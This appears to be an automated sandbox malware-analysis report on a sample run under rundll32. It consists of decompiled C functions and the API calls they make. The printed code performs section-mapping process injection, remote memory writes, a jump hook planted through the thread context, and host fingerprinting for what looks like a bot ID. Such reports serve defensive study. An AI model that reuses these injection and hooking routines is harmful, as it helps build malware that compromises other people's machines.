3468bbb 15168->15179 15195 346808f 15170->15195 15172 34677db 15173 34676f8 19 API calls 15172->15173 15174 34677fb 15173->15174 15175 3468ddf 2 API calls 15174->15175 15176 3467806 15175->15176 15176->14441 15177->15152 15178->15164 15182 3468a4f 15179->15182 15189 34689b9 15182->15189 15184 3468a7c 15184->15161 15185 3468aa8 GetLastError 15188 3468b37 15185->15188 15187 3468ddf 2 API calls 15187->15184 15188->15187 15194 3468dc9 RtlAllocateHeap 15189->15194 15191 34689ca 15192 3468a1b lstrlenW 15191->15192 15193 3468a2c 15191->15193 15192->15193 15193->15184 15193->15185 15193->15188 15194->15191 15196 34711b3 7 API calls 15195->15196 15197 346809e 15196->15197 15198 3468927 strncpy 15197->15198 15199 34680b4 15198->15199 15200 3468927 strncpy 15199->15200 15201 34680c8 15200->15201 15202 3468927 strncpy 15201->15202 15203 34680d9 15202->15203 15204 3468927 strncpy 15203->15204 15205 34680ea 15204->15205 15206 3468927 strncpy 15205->15206 15207 34680ff 15206->15207 15208 3468927 strncpy 15207->15208 15209 3468115 15208->15209 15210 3468927 strncpy 15209->15210 15211 346812b 15210->15211 15212 3471c34 13 API calls 15211->15212 15213 3468133 15212->15213 15213->15172 15214 34657a0 15219 346e565 15214->15219 15217 34657b5 GetLastError 15218 34657be 15217->15218 15244 3468dc9 RtlAllocateHeap 15219->15244 15221 346e57c 15222 3469ab3 RtlAllocateHeap 15221->15222 15241 34657b1 15221->15241 15223 346e591 15222->15223 15223->15241 15245 346a5fe 15223->15245 15226 3469f85 2 API calls 15227 346e5af 15226->15227 15228 3469fe4 2 API calls 15227->15228 15229 346e5c4 15228->15229 15230 3468d9a 2 API calls 15229->15230 15231 346e5cd 15230->15231 15253 346e3b5 15231->15253 15233 346e5d7 15234 346e5de 15233->15234 15260 346e3f9 15233->15260 15236 3468ddf 2 API calls 15234->15236 15237 346e6b1 15236->15237 15238 3468ddf 2 API calls 15237->15238 15239 346e6bc 15238->15239 15240 3468ddf 2 API calls 15239->15240 15240->15241 15241->15217 15241->15218 15242 346e5ed 15242->15234 15243 346e684 lstrlenW 15242->15243 15243->15242 15244->15221 15246 346a617 15245->15246 15247 3468e5d 3 API calls 15246->15247 15251 346a717 15246->15251 15252 346a692 15246->15252 15247->15252 15248 346a6ef 15249 3468f63 memset 15248->15249 15248->15251 15249->15251 15250 3468ecb lstrlenW 15250->15252 15251->15226 15252->15248 15252->15250 15254 3469f85 2 API calls 15253->15254 15255 346e3c7 15254->15255 15256 3469eab 4 API calls 15255->15256 15257 346e3d1 15256->15257 15258 3468d9a 2 API calls 15257->15258 15259 346e3dc 15258->15259 15259->15233 15261 3469c50 2 API calls 15260->15261 15262 346e412 CoInitializeEx 15261->15262 15263 3469f85 2 API calls 15262->15263 15264 346e42d 15263->15264 15265 3469f85 2 API calls 15264->15265 15266 346e43e 15265->15266 15267 3468d9a 2 API calls 15266->15267 15268 346e45a 15267->15268 15269 3468d9a 2 API calls 15268->15269 15270 346e470 15269->15270 15271 3468ddf 2 API calls 15270->15271 15272 346e47b 15271->15272 15272->15242 13469 3461e2a 13470 3461e47 13469->13470 13482 3461e42 13469->13482 13483 3469ca5 13470->13483 13472 3468ddf 2 API calls 13474 3461ea0 13472->13474 13476 3469e22 2 API calls 13474->13476 13475 3469b26 2 API calls 13477 3461e63 13475->13477 13478 3461eac 13476->13478 13479 346b787 2 API calls 13477->13479 13477->13482 13480 3461e78 13479->13480 13481 3468ddf 2 API calls 13480->13481 13481->13482 13482->13472 13485 3469cbc 13483->13485 13490 3468dc9 RtlAllocateHeap 13485->13490 13486 3461e50 13486->13475 13486->13482 13487 3469cfd lstrcatA 13488 3469d11 lstrcatA 13487->13488 13489 3469cf2 13487->13489 13488->13489 13489->13486 13489->13487 13490->13489 12965 3466438 12966 3466448 ExitProcess 12965->12966

            Executed Functions

            Function 0346D538 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 95%
            			E0346D538(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x347f8d4; // 0x50ffc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E0346F15B(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x347f9d0; // 0x50ffa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x347f8d0; // 0x50ff8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x347ce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x347f8d0; // 0x50ff8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E03468E2E( *0x347f8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E03468DDF( &_v36, 0x1ac4);
					_t119 =  *0x347f8d4; // 0x50ffc00
					_t155 =  *0x347f8e8; // 0x3460000
					_v36 = _t119;
					 *0x347f8e8 = _v8;
					 *0x347f8d4 = _t163;
					E03468EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0346D4B7(_v16, _v8, _v44);
					_t124 = E0346A5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x347f8e8 = _t155;
						 *0x347f8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































            0x0346d53e
            0x0346d544
            0x0346d546
            0x0346d54a
            0x0346d54c
            0x0346d54f
            0x0346d552
            0x0346d555
            0x0346d558
            0x0346d55b
            0x0346d566
            0x0346d569
            0x0346d570
            0x0346d570
            0x0346d575
            0x0346d578
            0x0346d57a
            0x0346d57d
            0x0346d586
            0x0346d77f
            0x0346d77f
            0x0346d782
            0x0346d785
            0x0346d78a
            0x0346d790
            0x0346d793
            0x0346d793
            0x0346d796
            0x0346d79a
            0x0346d79c
            0x0346d7b1
            0x0346d7b1
            0x0346d7bb
            0x0346d7c5
            0x0346d7c5
            0x0346d7cc
            0x0346d7cc
            0x0346d595
            0x0346d5af
            0x00000000
            0x00000000
            0x0346d5b5
            0x0346d5bd
            0x0346d5c5
            0x0346d5cb
            0x0346d5d2
            0x0346d5da
            0x0346d5db
            0x0346d5e2
            0x0346d5e5
            0x0346d5e6
            0x0346d5ed
            0x0346d5f0
            0x0346d5f7
            0x0346d5f8
            0x0346d5fb
            0x0346d607
            0x0346d629
            0x0346d631
            0x0346d634
            0x0346d63f
            0x0346d63f
            0x0346d631
            0x0346d65b
            0x0346d66a
            0x0346d66d
            0x0346d672
            0x00000000
            0x0346d69c
            0x0346d6ac
            0x0346d6ae
            0x0346d6b5
            0x00000000
            0x00000000
            0x0346d6ca
            0x0346d6dd
            0x0346d6f1
            0x0346d6fd
            0x0346d702
            0x0346d707
            0x0346d70d
            0x0346d713
            0x0346d71b
            0x0346d72b
            0x0346d737
            0x0346d741
            0x0346d749
            0x0346d74e
            0x0346d751
            0x0346d759
            0x0346d759
            0x0346d759
            0x0346d75c
            0x0346d760
            0x0346d761
            0x0346d765
            0x0346d769
            0x0346d772
            0x0346d778
            0x00000000
            0x0346d778
            0x0346d753
            0x0346d757
            0x00000000
            0x00000000
            0x00000000
            0x0346d757

            APIs
            • NtCreateSection.NTDLL(0346DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0346D5AA
            • RegisterClassExA.USER32(?), ref: 0346D5FE
            • CreateWindowExA.USER32 ref: 0346D629
            • DestroyWindow.USER32(00000000), ref: 0346D634
            • UnregisterClassA.USER32 ref: 0346D63F
            • NtMapViewOfSection.NTDLL(0346DA07,00000000), ref: 0346D66A
            • NtMapViewOfSection.NTDLL(0346DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0346D691
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0346D6D7
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0346D6F1
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,03466297), ref: 0346D769
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 0346D7B1
            • NtClose.NTDLL(00000000), ref: 0346D7C5
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: fab813ecea1b6bea278badf521be0876d8f24a1e0b8c4249bb12106af82324ce
            • Instruction ID: 2e7546cebf057e2d18bd3e17f384502caadd1f3164d93ccd1b7faaebb10d700e
            • Opcode Fuzzy Hash: fab813ecea1b6bea278badf521be0876d8f24a1e0b8c4249bb12106af82324ce
            • Instruction Fuzzy Hash: 018106B5E00219AFDB10EF95D884EEEBBF8FF09705F18406AE505BB254D770A904CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346D9DE Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 143 346d9de-346d9f7 call 346d309 146 346dad0-346dadb call 346d47c 143->146 147 346d9fd-346da0b call 346d538 143->147 147->146 152 346da11-346da48 call 3468f63 GetThreadContext 147->152 152->146 155 346da4e-346da8e NtProtectVirtualMemory 152->155 156 346da90-346daab NtWriteVirtualMemory 155->156 157 346dace 155->157 156->157 158 346daad-346dacc NtProtectVirtualMemory 156->158 157->146 158->146 158->157
            C-Code - Quality: 100%
            			E0346D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0346D309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0346D538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E03468F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0346D47C();
				return _t66;
			}



















            0x0346d9ea
            0x0346d9ec
            0x0346d9ee
            0x0346d9f7
            0x0346da02
            0x0346da07
            0x0346da0b
            0x0346da1f
            0x0346da27
            0x0346da48
            0x0346da4e
            0x0346da56
            0x0346da64
            0x0346da6a
            0x0346da6b
            0x0346da77
            0x0346da7e
            0x0346da8e
            0x0346dace
            0x0346dace
            0x0346daad
            0x0346daad
            0x0346dacc
            0x00000000
            0x00000000
            0x0346dacc
            0x0346da8e
            0x0346da48
            0x0346da0b
            0x0346dad0
            0x0346dadb

            APIs
              • Part of subcall function 0346D309: LoadLibraryW.KERNEL32 ref: 0346D403
              • Part of subcall function 0346D538: NtCreateSection.NTDLL(0346DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0346D5AA
              • Part of subcall function 0346D538: RegisterClassExA.USER32(?), ref: 0346D5FE
              • Part of subcall function 0346D538: CreateWindowExA.USER32 ref: 0346D629
              • Part of subcall function 0346D538: DestroyWindow.USER32(00000000), ref: 0346D634
              • Part of subcall function 0346D538: UnregisterClassA.USER32 ref: 0346D63F
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0346DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0346DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0346DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0346DAC7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: e94883bdee05786e42cdfae9c2d33883d3d62d2eb0e2f82ebba3c55824289ae2
            • Instruction ID: dd3490c1eee031327a65cc25f38134087a001c810e9b3ddf91678d476980a717
            • Opcode Fuzzy Hash: e94883bdee05786e42cdfae9c2d33883d3d62d2eb0e2f82ebba3c55824289ae2
            • Instruction Fuzzy Hash: C7313E76A0010AAFDB11DFA9CD44FEEBBBCEF08210F1441A6E505EA254D770EA44CB95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346DFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E0346DFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x347f8e8; // 0x3460000
				_t68 = E03468DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x347f8d0; // 0x50ff8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E034735A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x347f8d0; // 0x50ff8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E034697E9(_t194, _t207);
					}
					_t75 =  *0x347f8d0; // 0x50ff8c0
					_t77 = E0346CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0346CB85( *_t77) == 0) {
						_t79 = E0346CA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0346F3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0346F365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x347f8d8; // 0x50ffab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0346DFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E034697E9(_t149, _t211);
					}
					_t92 = E0346C85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0346C64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E03469BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E03469803(_t149, _t36);
					_t97 = E0346E34A(_t196, E0346A5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0346C870(_t97, _t37, _t216);
					_t99 =  *0x347f8d0; // 0x50ff8c0
					_t101 = E0346CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E03468F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0346DDBE(_t100);
					_t106 = E0346DDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E03469F85(_t105, 0xf73);
					_t177 =  *0x347f8d0; // 0x50ff8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x347f8d0; // 0x50ff8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E03468D9A( &_v8);
					_t113 =  *0x347f8d0; // 0x50ff8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E03469FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x347f8d0; // 0x50ff8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x347f8d0; // 0x50ff8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x347f8d0; // 0x50ff8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x347f8d0; // 0x50ff8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x347f8d0; // 0x50ff8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x347f8d0; // 0x50ff8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E034735A9(E0346E34A(_t62, E0346A5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E0347357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E034698D0(_t66, _t191);
					_t134 = E0346DB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































            0x0346dfc2
            0x0346dfcc
            0x0346dfd8
            0x0346dfdd
            0x0346dfe2
            0x0346dfef
            0x0346dff5
            0x0346dffa
            0x0346e000
            0x0346e010
            0x0346e015
            0x0346e01a
            0x0346e01a
            0x0346e02a
            0x0346e030
            0x0346e032
            0x0346e03b
            0x0346e03b
            0x0346e041
            0x0346e04e
            0x0346e053
            0x0346e059
            0x0346e062
            0x0346e070
            0x0346e077
            0x0346e07c
            0x0346e07c
            0x0346e07d
            0x0346e064
            0x0346e064
            0x0346e064
            0x0346e083
            0x0346e089
            0x0346e08e
            0x0346e094
            0x0346e099
            0x0346e09f
            0x0346e09f
            0x0346e0a8
            0x0346e0ae
            0x0346e0b2
            0x0346e0b9
            0x0346e0c0
            0x0346e0c7
            0x0346e0cb
            0x0346e0d2
            0x0346e0d3
            0x0346e0d5
            0x0346e0da
            0x0346e0e1
            0x0346e0e3
            0x0346e0e3
            0x0346e0f3
            0x0346e0f8
            0x0346e0f8
            0x0346e105
            0x0346e10b
            0x0346e110
            0x0346e112
            0x0346e11b
            0x0346e11b
            0x0346e123
            0x0346e128
            0x0346e128
            0x0346e12e
            0x0346e139
            0x0346e13e
            0x0346e146
            0x0346e14c
            0x0346e154
            0x0346e166
            0x0346e16c
            0x0346e174
            0x0346e179
            0x0346e186
            0x0346e197
            0x0346e19d
            0x0346e1a2
            0x0346e1a5
            0x0346e1a8
            0x0346e1b5
            0x0346e1bb
            0x0346e1c5
            0x0346e1c5
            0x0346e1cb
            0x0346e1d3
            0x0346e1de
            0x0346e1e3
            0x0346e1e9
            0x0346e1eb
            0x0346e1f8
            0x0346e1f9
            0x0346e1fa
            0x0346e205
            0x0346e207
            0x0346e20e
            0x0346e20e
            0x0346e218
            0x0346e21d
            0x0346e222
            0x0346e222
            0x0346e228
            0x0346e22f
            0x0346e230
            0x0346e23d
            0x0346e250
            0x0346e255
            0x0346e25a
            0x0346e263
            0x0346e263
            0x0346e269
            0x0346e26e
            0x0346e274
            0x0346e27a
            0x0346e27f
            0x0346e288
            0x0346e28a
            0x0346e291
            0x0346e291
            0x0346e297
            0x0346e29f
            0x0346e2a4
            0x0346e2a5
            0x0346e2aa
            0x0346e2b3
            0x0346e2b5
            0x0346e2c0
            0x0346e2c0
            0x0346e2c9
            0x0346e2d1
            0x0346e2d8
            0x0346e2dd
            0x0346e2ec
            0x0346e304
            0x0346e30b
            0x0346e319
            0x0346e324
            0x0346e325
            0x0346e329
            0x0346e32f
            0x0346e330
            0x0346e338
            0x0346e33d
            0x00000000
            0x0346e345
            0x0346e349

            APIs
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • GetCurrentProcessId.KERNEL32 ref: 0346DFE9
            • GetLastError.KERNEL32 ref: 0346E0E3
            • GetSystemMetrics.USER32(00001000), ref: 0346E0F3
            • GetVersionExA.KERNEL32(00000000), ref: 0346E1A8
              • Part of subcall function 0346CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03460000), ref: 0346CAFE
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0346E1D3
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bf051b8f2b534e974b2cf0f82b569d499c524043c7acb9dd167ebae97377e5ac
            • Instruction ID: dcf949ff73e78d8c5a0c9df0e67bf0b2008c9827ce8baf425ca8a35f7d97a3c3
            • Opcode Fuzzy Hash: bf051b8f2b534e974b2cf0f82b569d499c524043c7acb9dd167ebae97377e5ac
            • Instruction Fuzzy Hash: E9916F79700705AFD704EF75D888FEAB7E8BF48700F04416AE519DF241DB70AA548BAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346C778 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 94%
            			E0346C778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E03468F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x347f8d0; // 0x50ff8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E03469F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E03468D9A( &_v16);
				_t33 = E0346A5E9(_t43);
				E03469FE4( &(_t43[E0346A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0346A5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0346E34A(_t43, E0346A5E9(_t43) + _t40, 0);
			}
















            0x0346c778
            0x0346c781
            0x0346c78d
            0x0346c793
            0x0346c795
            0x0346c79d
            0x0346c7ab
            0x0346c7b0
            0x0346c7bf
            0x0346c7ca
            0x0346c7d7
            0x0346c7f1
            0x0346c7f6
            0x0346c7f8
            0x0346c7ff
            0x0346c80f
            0x0346c820
            0x0346c82a
